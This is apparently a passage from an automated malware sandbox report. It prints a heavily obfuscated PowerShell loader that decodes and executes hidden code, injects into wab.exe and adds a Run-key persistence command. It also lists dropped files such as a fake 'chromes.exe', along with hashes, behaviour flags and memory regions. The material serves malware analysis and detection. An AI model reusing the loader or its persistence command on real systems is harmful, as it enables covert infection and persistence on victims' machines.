BTIhhLiuHamYvbFuskucSirNoeObwAns O0To3En Li=Th CaVBaAAnRMa5St3Sj O'ChE A0SwCOv2DeDKe3 TENo4SaCSt8InCBi9orDGe4UdCBa8MoCHeBPaCSe2UnFLa0OdC PEReCAc9CoCmi3VeCZi8MaDno0Mi' H;Pl`$ MTSlhLiu BmShbEtsPecDorVoeStwChsGe0Un0In=SmVCeAHoRPi5Fo3Di Ub' RF K4ClCMeFUdCPh8InDMa0KuFBe0leC REAnC T9AnCEl3seCUn8KoD T0Ga'Gu; B`$RySPep oa Sl BtLoeTafRooPer kmFeerenMe6Fr Fe=st DVReAprR N5Si3Go Ga' f8Qu3ReF K7IsC d2AkCAk9GaDGd3TrDGl3ReCBr6AfCAnETrC BB T8Fl7ru9NsAIn8Ra7 KFBoCAfFSk4LiDWuEBiDRo4UdDTe3DeC B2VmCByAJu8Ma9MiFHa5OvD V2 MCDe9FiD k3NoCKlEthCPyA TCEx2Ol8Eu9GeE REAdCMa9 SDNo3 NC C2FiDDi5SkCDe8 MDSt7ScFAn4FoCco2ReDPa5BoDTr1opCFlE NC F4GrCJo2 pDSk4Sk8Ps9HnEStAUrCSc6CeDDy5 pDBo4MrCTzFHuCAf6unC FBVaFUnABr9 FDUl9HoD TESq0 CCSe2SaDIn3BaEKa3SoCTv2PoCGrB SCRe2HaCso0SlCok6EnD T3MeC S2UnEOp1tuCPi8HaDFo5TeEac1 MDNo2AvC S9WeC T4FyD S3SpCseEPhCLo8TeC u9LoFSt7 UC A8roCBoECeCdi9HeDAr3KoCDi2NyD T5 A8UnFSr8LyFClC M1SiC NCAsDDi7Hi8Re7Wa8Po3VaE GA PCKi6SaCKo4 fDtu5EmCRi8MaDMo4HaC G2PaCGe0trCGrASlC D2AfC R9BuD A3Ba8Sp7Se8ch3AlFRe5 VCRy2RaDVe1 FC K8DoCMaB tDPr2 DDSt3DrCCrEInCPi8DiCKl9 sCFoENaDca4BeD e3Bi9Hy3 F8SwEEn8ExBNo8Pr7Sm8OkFDgESe0GaEAi3 SFSt3Un8Kr7 UEFi7 R8KaFCyFPoCUnEFoEPeCTe9SaDev3pyF H7AiDEn3DuDSt5GhFNyAAp8upB S8Tr7 SFMoCAlFFs2 sEdeESpCBy9soDSp3Co9Od4in9Le5laFDrARe8LiB D8Sa7ArFdaC TFOp2TaEDiESkCSy9PrDUn3 E9in4Hy9Lo5MoFCoAAl8PeBPh8Ov7StFLaCheFSk2PeE KEPeCGa9DoD A3Be9De4Sw9Ci5AbFSoACa8LeESa8Es7 P8syFReFGnCRdEbeEPiCRo9PaD B3RaF F7PlDMe3FrDLn5TrFSoALd8IlE U8RaEEn8AdESu' A;Ch&Af( U`$AuRSpeUdvnooSplDau Ft RiProManSaiFuspltRe7 F)Sy Ja`$ ISSkpGraPal BtEgeFrfCooAlrPrm PeeknPr6Fo;Se`$StTVahSouFomKlblisHac MrgaeSkw SsBy0Su1 S Ap=Th StVDeANuRKo5de3 S Si'Od8go3 OEBeBchCIn8TrCAn4SoCGe8BaCFl1ShCFo8KaCCe4ApCHy8Ti8Bl7Se9 BAZe8 T7ReFStCRaF T4CaD VE UDTr4ViDEp3MaCUf2InCOpA Q8 K9 LFTe5GuDBi2MuC C9HaDch3NoC OENoCpeA KC v2Di8Af9GlEApESiCLu9BuD L3 KC A2RiDTe5AbCHo8CaDFo7HjF T4GaCBa2 SDSp5naDCa1DeCBrE tCBa4ImCda2ToDMi4Pr8Fi9BeEKrA TCMa6UnDej5ThDSe4DeCmnFNoCIn6StCDiB KFReA G9ErDBa9FrDAfETi0 UCAl2PrDGo3ReEud3 LCSa2MaCMaBHyCAt2GgCSt0DeCpr6SkDLm3ChCIn2SpEpy1HaCTi8FoDKo5PeENy1SaDSi2NoCOu9ApC P4StDSm3 PCPaERoC T8HaCGu9 AFBe7LeChj8SeCPaEAiCRe9StD f3SuCAf2CeDka5Na8idF Z8GiFStCWo1udCCeC SDBa7Pl8 P7Sc8Fo3HeEHoCDoD B2PrD R7ViC T2VeDRa5AkCtiEBeC O9 SCBe0TfC a2KuD K5luCmo9AsCNo2So8 S7Do8 S3SpFCa3LaCTrFRyDUm2DgCOsA UCMu5OrDFr4AaC S4 EDKr5 SC V2 pDSp0daDtu4Fr9Mo7Lo9 N7Pe8UnEOc8ReB F8Ib7 B8GrFTaECh0PaEKl3anFEx3Af8 s7AnE T7Ov8PuFBoF DCLiE PERhCVr9AnD A3InFan7 WDSa3AcDFo5CaFExAIn8SaBFu8Te7hjFUnCSaFIl2MiEDiE TCTo9MaDTr3Pi9 C4 C9Un5FoFBeADa8PcEUn8Do7 S8NuFCrFCaCNaEFrEGrC N9vaDfa3SoFEk7BrDVo3KaDBi5NyF FA P8AfEMe8KrEBe8ToEAb'St;Un&Bl(Co`$ ERUnelavPao SlUnuUnt PiCoo Cnpsiins Rtta7Pr) N Su`$InTPahPruCimJebPasUdcLarIne RwReste0sa1No;Im`$EnTNoh FuPhm Jb fsDicPirprePrwKosFj0Sy2Fo Sk=Sp lVOiA SR R5Ph3 g Kn'Sr8In3 EFCh4 FCPe2HaCiz4DaCPeFDe8Ra7Me9EkAOp8 P7 IF OCDaFRo4PoDLiEUdDTr4KoDDe3slCUp2OrCEgAAr8Zo9UdF F5 SDRe2FaC R9PaDSk3 EC SEWoCNaASpC S2Ti8ki9UnEBrEgyC P9 VDIn3MiCKl2SkDWa5JuCFo8CoDDo7OvFSt4 RCSh2 TDCo5SpD C1lcCSyEOpCCh4SkCve2 UD N4Fl8Re9FoEFrASpC C6SyD A5SaD I4PrCAtFtiCPa6DaC ABKaFZeAAd9 NDTa9 ADViEGo0AnCOx2 TDLi3FiE N3 AC U2BaCEqBHuCNo2ToCRe0FuCRe6OkDRo3AfC T2BoEFa1taCBj8KoDMa5guEAf1ReDSp2 pCNo9 SC H4BrD A3FrCKoE SC X8 SC a9BeF D7HoCDv8PoC TEAfCGa9UnDBe3OuCHo2TaDSl5Fo8TeF k8TuFRuCTa1TrCTrC SD G7Af8 M7Fa8 U3UtEChA bCBl6 NCre4 SDDi5AuCMu8 KD S4NoCpr2GoCSy0 RC KA SCFo2UnCYd9OvDOu3Gi8Br7Po8Ge3RiF P3EnCEmFInDNo2BrCOmAArCAf5EoD N4ElCso4SkDPo5 RCSi2InDLu0opDFa4Es9En7Ex9Un4Vm8JuEDo8 PBSl8Sl7Ou8MoF CE B0 fE G3ElFKa3Fe8In7PoEOm7Gn8InF UFDrCSnEGrEPuCAs9UrDRe3SaFPr7SeDRi3 MDCh5 BF AA S8 FEOu8Ph7Bl8PrFBoFTrCAfERiE FC K9GlD F3 AFBr7ArDPr3GrD K5ZiFToAOn8ReE S8 CEEl8OpEju'Dd;Ar&Be( F`$InRSueKnv SoKalBeuBet Oi EoPanSriSts Mt M7Fo)Di S`$PrTPrhKeuTam BbRes Bc prHae MwAksCh0 G2 W; H`$ BSLipBoaGolSetReeFofPloSorEjmfoeJansw7Ky Gy= Z CV SAUdRCi5Ce3Tr Sm' G8 C3HjD O4BlCMi8OpCMu0MaC g0LaCAp6 IDLe5KoD H3BeCLiFBe8 r7le9AfAye8Do7 G8Gu3ReFGe4TaCTi2PrCse4BaCMaF W8Kr9 PEBoEEfCAr9 BDBr1LaCDj8DeCAtCSyCDe2Br8CaFQu9Sn7Te8NoEUd'Vi;Ki&Ga(Im`$KaRBaeLavHuo HlChuCytCliKroBunLiiFoshat N7Pr)Sk O`$VaSSvp Ba SlActIreHefWooSorIamTreblnGu7Ou;Ph`$StSRopExaTalPhtSwe lfSaoTir TmCheTanKe7Sn Od= D UkVLnA SRCo5Ud3To Me' S8de3DoE fBPeCHy8OpCGr4SeCAu8glCMa1SlCTr8 ECAd4 FCLe8 S8Ps9MeEThE fCSt9BeDEf1DuCTe8UdCEnCAuCLi2Ab8SuFAf8Gn3KrDPa4SiCun8PoCKu0GrCSu0DeCHe6 FD P5SoDSe3OlCCrFsu8KoBFu8Cl7op9Br7Fr8 NESa'Ng;Du&Se(Bl`$DiRSkeUovNeoNsl Vu VtRiiSioUdnFoi Ss Mtio7Ne)Sk Un`$ VS SpNaaMalFetliePif Co FrWomFreGanBa7Mu;Ta`$KlP KhBil AeSabPuoBatRroBamMauDas M Ul= S WafaukBapNo S`$ IRVie BvBeoKolMeuFrt HiIdoVenGliBasTit S5To Op`$ KR UeAfv Bo PlabuDytPai SoGonRoiHusUntdi6De;Ov`$BrS DpSkaKllSktReeByfVioCrr BmAdehenDo7Go A=Ef CoVBlApaREl5De3Ca T'Ve8Fu3PoF R4 ACAlBPyDReESvCRe9UnCRe0 LC B5 CCInB SD S3EvCIg2Wh9De4 S8 I7ar9SpA I8Pr7Fo8Sh3 BFFo7DuCFj2 OCKu9BiD F3SaDRe3 LCPr6StC DE CCEyBUd8Be9SuEUnE DCOv9SeD D1 OCSe8MeC IC UCPl2Go8MiFto9 V7Ko8 IBFe8Sp7Al9 d1Te9An3 D9RiEHo8FiB S8Su7At9Ep7AuDUnF S9Su4Sk9Ka7Ho9Sj7Fo9Ge7 U8 OBSa8st7Ol9To1En9Di3Pi8 GEFi' L;Sc&Ar(Hu`$ SRfoe AvCioGelCruUdtKoiMio UnWaifos LtSl7 C) A Fa`$ FSRepPra Ul OtIre CfSpoInrInmDaeunnPe7Si; D`$JaSKopFoaFol HtNyeMifTooCarHem IeInnAn8Ne Zu= C AbVMiAdiR G5ep3Sp Ca'Bi8Fo3 SFan1LyCHa2OfDLi5DeDSm4NoCOxEUnC E1DaC IEsiCPaCStCRe6MaDPh3BrCym8AfDHi5SeC FETrD f4BaCAlCHu8Gr7Me9RiA t8 D7De8Ho3 SFAf7UtCSa2PaCMi9baDVi3SoDTu3ArCMe6StCUsEBeCOpBTo8Ko9 BEAnEHyCTi9ReD C1AlCdr8 DCRiCMaCAn2Po8MaFPe9 H7bi8 TBGw8Li7Sa9ad2Pr9ru0 F9Ho2Dy9Br5Cr9Ta7 D9St6Fe9Ek5Ar9GoFDe8 SBSh8 f7Ba9Sk7FrDMiFFl9 H4 B9or7Mu9Se7No9 f7Ca8GrB S8 R7Na9Re3ov8amEWh'ae;Af&Th(Lu`$epRHveDavSko SlFouPet hiProHyn GiVesSptDe7Sp)Be Sk`$MiS KpAfaInlNotOveidfDooArrFomSaePanAm8So;At`$NoSPolCay PnjagAlbUnl TtSte h2Rh=As`"""Pu`$PaeCinSpv s:SvABlPSiPbeDKvA STMiAKe\SyTpruMolNolDeiStbFoeRaeEmsTh1vi3Ba\MeiPsrUnr CeTocKoi BpOprUnoAdcSeiUnt LyGa\JeSbokOuiNepLipJaePurLosTe. TUSpnFodSu`"""Tj; B`$ fSRep La Hl OtReeFrfSco BrComPseOmn T9Sp Da=Aa PaVSoAGoRPa5Ir3Pl Co'Su8Ot3PeFUd4 DDsm7GaC L6SaCEkBBeDTh3MyCNo2GrC D1IcCUd8ClDVe5UnC FASuCFo2JaCTr9 A8Va7 S9 VA C8 O7HeFScCdyFHa4GnDTrEStDUg4MiDRe3MeCCa2HuCNoA P8Me9VaEHjEPsE F8Sv8 E9 EE I1LyCRiEOuCNiBEaCPa2BiFcoAse9AaDAm9ViDMeFNo5JaCVe2TrC T6LuC M3AcESa6 LC BBSvCInBSaEGe5ObDkiESiDMd3ReC F2noD s4Pr8VeFGr8Ac3TrFra4SuCVeBphDSiEteCFr9NoCCo0UdC P5 SCKoBElDMe3InC B2 S9 S5He8BaEFi' S;In&Cu(Co`$EqRSteSevAlogrlFouKatreiToo Sn Di Ps ftLo7Ge) C Vr`$ BS TpUnaMalFat FeFofSpo rrFomPoeIsn S9Du;Ni`$InFDeeMatNoiMupSpaBorFooCeuDesEx9Va5 P0Am Mu=un SaVGaAUnRRo5Co3Il Se'ReFRiCboFHe4TeDVrE gDve4LdD E3MoCKo2 BCAfASe8Te9LlF c5TrDSt2DiCTe9DeDLv3 HC SEunCStAScCEr2Ag8Un9EjE NEBjCTu9NoDAr3FrCam2EjDSk5MeCSk8 GDBa7SkFAb4 BCNe2OvDOp5PrDOc1 GCAlEInCTa4TyCOv2ThDSa4 b8Af9NuEIsAOmCBa6RiD C5UnD D4MoCWaFFeCMe6DeCPoBMiF OAHo9WhDVe9SkDOpE C4 ZCBl8ReDRu7AkDGuEWa8SyFPr8Sh3SuFSk4PeDFr7BaCTr6FaCBeBFoDHe3 WCLi2 CCMa1BaC N8AuDGe5AtCAiAfaCOp2 VC f9pr8BoBSc8 p7Ba9Ko4 F9Na7af9 D5Fl9st3 K8suBAl8Ex7Re8Fo7Cr8Sa3BaF i4ThCMeBLaD AEMaCSo9 ACAs0CaCni5GrCluBUnDRa3LeCCe2sc9Bi4Sk8DrBNo8Mi7Ho9Lu1 S9Oi3Uo9UnEhu8TrEBe'Di;Ap&Ra(Fo`$UdRsaePhvSio UlFouPatTriFooTenPhiUns HtSe7 T)Ex Tr`$ReFPoe CtCoiKrpGaaSarBloJuuFisln9 E5Me0Ho; N`$DeSToeAckLetEviImoKonSlsAncAnhSoeMuf OeEnr IsHn=Mo`$UnSFlp KaTwlTat WeApfGeosyrStm LeFanGu.TvcDioGau OnUdtEn-sp6Ph4Sa9Te-Er3St0 T2Pe4Ti;Sp`$ShFAreSutDeiknp Ka GrDuoTruwesNe9Ch5Un1Ch fr= C EVBlAKaRFo5Ya3Ga L'DyFFiCNeFFo4ReDSiEExDUn4ArDTe3 DCFo2 TC FAPr8Li9GaFEx5SeDCr2PoCSu9StDAl3 HCSaEUnCReAPrCGn2 S8Or9MiERdENeCPr9CoDSl3 TCMa2 SDSk5BiCOp8PyD I7OvFHo4RuC S2naDRe5HeDOv1LoC SEmiC R4GaCCo2 CDDr4Be8 U9ClEAdAPrCmi6EyDBe5 ADFr4BiC KFAuCIr6FiCStBFrFFoASp9faDRu9ClDFuE S4FoCRa8EkDTr7SuDDlESn8SoF I8Li3SiFGr4 KDNi7CiCFa6LiCOuBPrDPr3BoC S2ChC u1BlC U8SmDHa5StCPlA FCGo2HoCKo9 V8 RBJu8Ko7ni9Fi1Ab9Da3Ob9PaEDu8 LCDr9Tr4Fr9Mi7Mu9Up5 b9Un3de8 MBDe8Fi7Ar8ch3 KFCr1ViCSh2MiDUn5SyDUn4PhCKaEDaCId1KjCCoEsyC MCAmCUn6AcDTi3UnCBr8CeD t5NoCMeE TDAr4SkCSeCte8HoBOm8 P7Ia8 B3UaFDe4IdCAc2NiCudC oDNa3EnCMaEPeCDo8UdCIn9SpDMe4KrCDe4RiCSaFDeCEv2EkCKr1 aCBo2 UDMa5EkDOv4fa8 sEMi'Ro; K& B(la`$buRPoefovhioDalEcu StOwiovoSun SiKnsFatBi7Tn)In In`$PrF PeUntIniRap taOlrGio PuPos R9Jo5 P1Ch;Pe`$AtF Ae HtPriHapPraMir ToStu FsSt9Ma5 R2 U Pl=Un FaV FAMuRDa5Ch3Qu Kr'Ud8Mi3UnEBe8StC U1 TCRe1OvDpi4LoCFi2FoD U3SiDUd3GeCTi2NiCTy9 T8Fo7 B9HaADe8Ti7SqFAnCIlFar4SkDGrE KD F4MiD D3 NCBr2TaCSoAWe8Do9GlFre5PrDci2tmCUn9CoDPh3 IC SEUnCHiADaCGr2Cr8Wa9FuEOvESpCBa9 DDTr3 ACta2TrD P5 PCVi8OpDFa7UnFEn4PaCEn2ElD F5KvDbl1UnCCoEEnCMo4BrCMi2TiDDe4Ch8No9DeEAdATaC T6TyD K5 sDSy4 SC TFChCRa6SeCSjBBaFUnA H9 VDAr9wiDPiEJa0taC P2EkD S3WrEHe3noCBe2OmCStBmiCHv2DeCCu0InCPa6FoDsi3SpCGe2 REBa1DeC f8StDed5SeEOp1KnDhy2SkC M9FoCPe4HuDHi3ScCJoEMaCSk8AbCTe9 AFAd7SyCCi8MyCMaEHiC A9 ADGu3GuC N2AnDAd5Br8 DFSo8 RFAmCOu1BaCSeCBrDGd7Tr8Se7To8 I3FoEDdCPeCSaERiCPa9NoC L0MuDDd4DoCCoBphCAf2RuDBaE S9Va1 U9Wo5 K8 F7Ok8Co3BeESuC OCStBSaCMe6DaDIm3 SD S5MiCGaESpCEs9 AC P0un8PeECo8ReB E8Pa7Ou8 GFlnEVo0 EEUd3DiFFr3 I8Ba7KuEDe7Bi8UnFAnFLoCTwEBaEfiCTi9ReDCo3BrFEn7BiDVa3MeDBj5FeFCaA S8 SBla8Fr7AcFDiCBnETeEFyC d9GeDGr3SpF S7 FDWh3InDAn5 KFSlASu8PaBCh8ln7FeFAfCVeECaEUnCEg9RuDRo3PoFNi7PeDDr3LfD S5InFEkAUn8BhBFo8St7 FFKrCunEOrE SCGe9KlDMo3TaF F7 EDEk3 LD R5WaF PAHa8GaBVa8Pa7 FFNeCSyEStEdeC E9prDHe3AnF K7UnDPr3 MD D5SeF AAGo8StE Y8Un7Ge8SwFGlFBoCsoEAlEBeCBr9 RDTi3MeFDe7HeDSt3FaDSh5 EF RABy8ChESe8 PEUn8DeETo'Sa;Ku& S(Na`$FoR SeGyvRooMelFou UtMeiKroHanMoiPosFrtUn7Eo)Se Pe`$HeFAae Bt DiChp PaUdrSuoUnuCos G9He5 S2Pa;Pl`$SoFGle CtLaiRap GaBer UolauAps U9Fr5My3 C Ba= E EpVSeAAmRod5 G3 b Ga' S8ki3HaECa8SpC S1saCPa1EnD T4RaCKa2 TD S3KaDAl3 RCPa2VeCTa9 A8Re9AfEFoEBrCTe9TrDMo1AsCDy8SpCScCAnCSa2Vo8AmFCa8Pe3caFFa4PoCRaBTiD SE ACBo9GtCud0 BCTe5StCJoBNoD T3 SCGe2In9Da4Ho8StBSe8Sl3 HFAc1 TCPh2 DD S5 RDSk4PaC IECrCKa1 RCPrEHyC NCAnCve6ReDCi3EnCSi8ViDAc5MoC SEReDAn4MuCAtCRe8ReBVa8da3PeFCh7spCLeFUpCBoBklCEm2DaCUl5koCDi8BiDTi3CuCFe8 UC MAVaDTi2FoDTe4Sa8OpBFo9Ne7 M8ErBDa9 B7 T8ReE O'Le;Pr&Ta( s`$viRBie KvsgoDilSpuEstRii FoKon Ci SsWet P7Va)Ni So`$BeFIneStt OiVapRyaUnrUroImuWosOs9Co5Dr3De# L;""";<#Nonnuclear Suicided Inseminationerne Returneringernes Rnneboerne Witchen #>;;function Fetiparous958 ($Kammerjunkerenassinet,$Kammerjunkeren) { &$Hight1060 (Fetiparous959 'Ki$WaK OaswmpamKveInr DjfjuManStkSaeNerDeeAnnCoaAgsLusUniConphe ftFa S-BubUhxIno Drre Fa$MeKFoaFomTomFoeTrreijSyuInnStkAfeIrrUneKonBo ');};Function Fetiparous959 { param([String]$Hidalgo); <#Unfeary Reparationsarbejdet terrorregimentet Disjunktionens cafeteriaer Protorosauroid #>; $Thone=2+1; For($prostern=2; $prostern -lt $Hidalgo.Length-1; $prostern+=($Thone)){ <#Talocalcaneal Chitons Skossernes #>; $Thumbscrews+=$Hidalgo.Substring($prostern, 1)} $Thumbscrews;};;$Hight1060 = Fetiparous959 'DuI pEFdX P ';$Hight1061= Fetiparous959 $Madreporarian;&$Hight1060 $Hight1061;<#Talcums Hjreb Orchestic Envenomous Magisterforenings #>;"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3312
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          4⤵
            PID:4440
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
              PID:3368
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:2424
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Pseudoimpartially" /t REG_EXPAND_SZ /d "%Rygelige% -windowstyle minimized $Retssags=(Get-ItemProperty -Path 'HKCU:\Rodehovedet\').Tilforladeligstes190;%Rygelige% -windowstyle minimized ($Retssags)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3092
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Pseudoimpartially" /t REG_EXPAND_SZ /d "%Rygelige% -windowstyle minimized $Retssags=(Get-ItemProperty -Path 'HKCU:\Rodehovedet\').Tilforladeligstes190;%Rygelige% -windowstyle minimized ($Retssags)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2120
              • C:\Program Files (x86)\Chrome\chromes.exe
                "C:\Program Files (x86)\Chrome\chromes.exe"
                5⤵
                • Executes dropped EXE
                • Modifies registry class
                PID:2592
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:548

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files (x86)\Chrome\chromes.exe

          Filesize

          384KB

          MD5

          e669ba7a01995b2e4cd96a807330a49e

          SHA1

          aec83b2d0d9236c83da013fc598e280a578d3848

          SHA256

          44ba49f8d36da8399419b7ca1c380453569d34d10692404c73d480aaee65d038

          SHA512

          3f0484e571a5b6cccbf10507036256a86ae4fcd8c10a2f97cff5a943cf1613d7d34c5adbfd2b009fd90c930c0e7ad637740589892e877dc1d59fc2e44e0dcef6

        • C:\Program Files (x86)\Chrome\chromes.exe

          Filesize

          504KB

          MD5

          251e51e2fedce8bb82763d39d631ef89

          SHA1

          677a3566789d4da5459a1ecd01a297c261a133a2

          SHA256

          2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9

          SHA512

          3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Filesize

          53KB

          MD5

          fc208db13b1239bfa1f4ee94d3505352

          SHA1

          c998505025d8ac13f7052a4decd767fdc89020e3

          SHA256

          bfb025eec226b78ba8230ab9a034404627919ee26cd9cd3954526b5954b11206

          SHA512

          60a8dd3bc269a47ede1459016ca8d641ac6078d8b160c3f12929f56c1f384f89c08a61642acedf59d2bbf4702232eabac6392f12ab9d037a911adce0e73bea67

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_imfd5fsp.yq0.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Tullibees13\irreciprocity\Borickite\Lydsidens\Tellys\Rindes.Gaa

          Filesize

          25KB

          MD5

          3d70a9e67eaf95e60a6e40caf76d3bac

          SHA1

          a7ddd601c5424f64bcdf3932b73433bfb42e51fa

          SHA256

          969bbd66a083c88e1bb30bde316accfb05e52c24622caf1fd06036ea9bd00245

          SHA512

          78181da5e37bb50c4aa9c747e126eb732ec74dd70815e4dc06d3afcef655a7c8a0fd21b2be63ae44fc9a14990c72ff25134030870a2a630f07ec18451326a9cd

        • C:\Users\Admin\AppData\Roaming\Tullibees13\irreciprocity\Skippers.Und

          Filesize

          496KB

          MD5

          35e2f5a6eb2f9bb2d3ff6344f644de9e

          SHA1

          4c988c26277df97a854993f6d81e985a89152b6d

          SHA256

          6a456dff17b4fab71131d0c08dae65a4ac4008de949bb2fec0f36b5e64a2bfac

          SHA512

          d0cd049da081c4f9c68c20755a9a8760b6eeded2a3d8238c02114bfc84d90a6d93e024969ec5f8777fab879251a973ce99f615e5b081e3aa16878d17ae7696fb

        • memory/2424-139-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-106-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-173-0x0000000001000000-0x00000000046DB000-memory.dmp

          Filesize

          54.9MB

        • memory/2424-70-0x0000000001000000-0x00000000046DB000-memory.dmp

          Filesize

          54.9MB

        • memory/2424-135-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-142-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-144-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-149-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-151-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-153-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-152-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-150-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-148-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-105-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-147-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-146-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-145-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-126-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-143-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-140-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-141-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-138-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-137-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-134-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-133-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-132-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-131-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-130-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-62-0x00000000773C8000-0x00000000773C9000-memory.dmp

          Filesize

          4KB

        • memory/2424-63-0x0000000077341000-0x0000000077461000-memory.dmp

          Filesize

          1.1MB

        • memory/2424-74-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-71-0x0000000077341000-0x0000000077461000-memory.dmp

          Filesize

          1.1MB

        • memory/2424-129-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-128-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-127-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/2424-125-0x0000000000400000-0x00000000005E4000-memory.dmp

          Filesize

          1.9MB

        • memory/3312-49-0x00000000086F0000-0x000000000BDCB000-memory.dmp

          Filesize

          54.9MB

        • memory/3312-50-0x0000000007A10000-0x0000000007A11000-memory.dmp

          Filesize

          4KB

        • memory/3312-36-0x0000000005410000-0x0000000005420000-memory.dmp

          Filesize

          64KB

        • memory/3312-35-0x00000000749A0000-0x0000000075150000-memory.dmp

          Filesize

          7.7MB

        • memory/3312-61-0x0000000077341000-0x0000000077461000-memory.dmp

          Filesize

          1.1MB

        • memory/3312-60-0x0000000005410000-0x0000000005420000-memory.dmp

          Filesize

          64KB

        • memory/3312-59-0x0000000005410000-0x0000000005420000-memory.dmp

          Filesize

          64KB

        • memory/3312-58-0x00000000749A0000-0x0000000075150000-memory.dmp

          Filesize

          7.7MB

        • memory/3312-37-0x0000000005410000-0x0000000005420000-memory.dmp

          Filesize

          64KB

        • memory/3312-136-0x00000000749A0000-0x0000000075150000-memory.dmp

          Filesize

          7.7MB

        • memory/3312-47-0x0000000008070000-0x00000000086EA000-memory.dmp

          Filesize

          6.5MB

        • memory/3540-16-0x00000000061B0000-0x0000000006216000-memory.dmp

          Filesize

          408KB

        • memory/3540-14-0x0000000005950000-0x0000000005972000-memory.dmp

          Filesize

          136KB

        • memory/3540-12-0x00000000053A0000-0x00000000053B0000-memory.dmp

          Filesize

          64KB

        • memory/3540-51-0x00000000749A0000-0x0000000075150000-memory.dmp

          Filesize

          7.7MB

        • memory/3540-55-0x00000000053A0000-0x00000000053B0000-memory.dmp

          Filesize

          64KB

        • memory/3540-13-0x00000000059E0000-0x0000000006008000-memory.dmp

          Filesize

          6.2MB

        • memory/3540-56-0x00000000053A0000-0x00000000053B0000-memory.dmp

          Filesize

          64KB

        • memory/3540-57-0x00000000053A0000-0x00000000053B0000-memory.dmp

          Filesize

          64KB

        • memory/3540-30-0x0000000007A00000-0x0000000007A96000-memory.dmp

